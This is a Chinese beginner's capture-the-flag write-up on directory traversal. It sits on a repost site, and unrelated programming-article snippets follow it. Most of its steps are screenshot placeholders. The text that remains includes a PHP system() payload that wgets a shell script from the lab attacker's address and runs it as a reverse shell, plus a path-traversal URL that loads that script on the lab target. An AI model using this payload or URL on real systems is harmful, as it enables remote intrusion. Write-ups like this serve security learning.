小白学习CTF第十天-目录遍历漏洞_目录遍历漏洞、目录遍历漏洞实战、目录遍历漏洞渗透、目录遍历漏洞技巧、目录遍历-程序员宅基地

技术标签: 安全  linux  信息安全  

目录遍历漏洞简介

在这里插入图片描述

信息探测

在这里插入图片描述
在这里插入图片描述
信息探测与之前的操作一样,可以看到了开放了http80端口可以,尝试使用更加高级的方法进行扫描,其余的端口也可以尝试,看看是否有关键信息。
在这里插入图片描述
在这里插入图片描述
使用了nikto 以及dirb进行探测。我们尝试打开一些敏感信息。
在这里插入图片描述
在这里插入图片描述
之后打开,我们可以看到一个登陆输入密码的地方,这里可能存在漏洞,可以进行攻击。
在这里插入图片描述

漏洞扫描

使用owasp-zap
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
从扫描结果中可以看到,的确存在一个路径遍历的高危漏洞。
打开对应的URL在这里插入图片描述

分析漏洞扫描结果

在这里插入图片描述

上传webshell

在这里插入图片描述
在这里插入图片描述
利用自带的反弹shell进行攻击。
在这里插入图片描述
记得修改对应的信息。IP以及监听端口号。
在这里插入图片描述
上传shell。

<?php system("cd /tmp;wget http://192.168.56.104/shell.php; chmod +x shell.php;php shell.php");?>
<?php system("cd /tmp; wget http://192.168.56.104:8000/shell.php;chmod +x shell.php;php shell.php");?>

在这里插入图片描述
在这里插入图片描述
再次登陆对应的网址,修改后面的信息。

http://192.168.56.102/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr/databases/shell.php

开启对应的服务,以及监听。

python -m "SimpleHTTPServer"

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

总结

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105744462

智能推荐

java烟花代码_java代码放烟花-程序员宅基地

文章浏览阅读1.7w次,点赞10次,收藏74次。直接运行下发代码就能看到美丽的烟花啦,如下图:package com.inossem.mdm.controller;import java.applet.Applet;import java.awt.Color;import java.awt.Graphics;import java.net.URL;import java.util.Random;/*** 放烟花** @author 吕兴*/@S..._package com.inossem.mdm.controller; import java.applet.applet; import ja

【Axure高保真原型】多选树穿梭框选择器_axure树形多选原型下载-程序员宅基地

文章浏览阅读540次。今天和大家分享多选树穿梭框的原型模板_axure树形多选原型下载

生成UUID(保证唯一性)_vba 唯一id生成函数-程序员宅基地

文章浏览阅读1.5k次。String uuid = UUID.randomUUID().toString().replace("-", “”).toLowerCase();_vba 唯一id生成函数

服务器硬盘挂载(永久挂载UUID)_disk.enableuuid = "true-程序员宅基地

文章浏览阅读3.9k次。1. lsblk命令可以清晰的获取全局的块设备布局,如果未挂载,moutpoint点是空的。该命令会显示服务器上所有的硬盘,包含未挂载的。 df -h 命令 只显示挂载的硬盘概况 2. 查看未挂载硬盘的UUIDls -l /dev/disk/by-uuid/ 获取UUID3.vi编辑/etc/fstab文件系统信息,在最后加入未挂载硬盘信息。挂载信息编写遵循这些字段《file system》 《mount point》 《type》 《options》 ..._disk.enableuuid = "true

Python教程:zipfile模块压缩文件(1)-程序员宅基地

文章浏览阅读508次,点赞21次,收藏5次。讲解视频,并且后续会持续更新**

Laravel 后台管理员修改密码(API)_laravel-admin 修改后台密码-程序员宅基地

文章浏览阅读1.5k次。紧接上一篇,我们来完成用户修改密码这一部分。编写好我们的路由: Route::post('changepsd', 'ChangePosswordController@changepsd');然后创建一个控制器:<?phpnamespace App\Http\Controllers\Web\Admin;use Illuminate\Http\Requ..._laravel-admin 修改后台密码

随便推点

map/unordered_map基础用法_unordered_map用法-程序员宅基地

文章浏览阅读3.3k次。map是STL里重要容器之一。它的特性总结来讲就是:所有元素都会根据元素的键值key自动排序(也可根据自定义的仿函数进行自定义排序),其中的每个元素都是<key,value>的键值对,map中不允许有键值相同的元素,因此map中元素的键值key不能修改,但是可以通过key修改与其对应的value。如果一定要修改与value对应的键值key,可将已存在的key删除掉,然后重新插入。定义原型:它作用应用场景可用作①字典 ②统计次数相关操作(1)插入操作方式有..._unordered_map用法

iOS学习笔记26-视频播放-程序员宅基地

文章浏览阅读194次。一、视频在iOS中播放视频可以使用两个框架来实现:MediaPlayer框架的MPMoviePlayerController和MPMoviePlayerViewControllerAVFoundation框架中的AVPlayerAVKit框架的AVPlayerViewController【iOS8之后才有】但在近两年的WWDC上,MediaPlayer框架被iOS9标记为d...

解决从PDF复制到Word中的英文字母变成宋体格式的问题_为什么word导出的pdf文件中time new roman字体变了-程序员宅基地

文章浏览阅读1.6w次,点赞38次,收藏9次。 今天在写报告的时候,复制了一个论文里的参考文献,结果粘贴到Word变成下图的样子,而且无法改成英文字体,却可以在汉字字体中更改。网上找了一圈后,最后发现是全角和半角的问题。全角和半角指的是输入的英文字母或数字的大小,全角输入的英文字母及数字是正常汉字的一半,全角输入的和正常汉字等大。一个汉字要占两个英文字符的位置,人们把一个英文字符所占的位置称为"半角",相对地把一个汉字所占的位置称..._为什么word导出的pdf文件中time new roman字体变了

Aspose.Pdf 转图片的正确姿势_aspose pdf转图片-程序员宅基地

文章浏览阅读3.1k次。如何优雅的将pdf转换成图片 public static List<File> pdf2PngByAspose(File sourceFile, File destDir) { List<File> resultFiles = new ArrayList<>(); String path = sourceFile.getPath(); if (FileUtil.isPdf(sourceFi......_aspose pdf转图片

决策树(理论)_布尔决策树-程序员宅基地

文章浏览阅读835次。0.机器学习中分类与预测算法的评价指标1)准确率2)速度3)强壮性(算法稳定)4)可规模性(适应于不同规模)5)可解释性(容易解释结果)1.基本流程1)定义:决策树是一个类似于流程图的树结构;其中,每个内部节点表示在一个属性上的测试,每个分支代表一个属性输出,而每个树叶节点代表类或类分布。树的最顶层是根结点;2)地位:决策树归纳是一类最简单也是最成功的机器学习方_布尔决策树

CSAPP第七章学习笔记_csapp第七章笔记-程序员宅基地

文章浏览阅读770次。文章目录第7章 链接7.2 静态链接7.3 目标文件7.4 可重定位目标文件7.5 符号和符号表7.6 符号解析7.7 重定位7.8 可执行目标文件7.9 加载可执行目标文件7.10 动态链接共享库7.11 从应用程序中加载和链接共享库7.12 位置无关代码7.13 库打桩机制第7章 链接链接是将各种代码和数据片段收集并组合成为一个单一文件的过程,这个文件可被加载到内存并执行。7.2 静态链..._csapp第七章笔记

推荐文章

热门文章

相关标签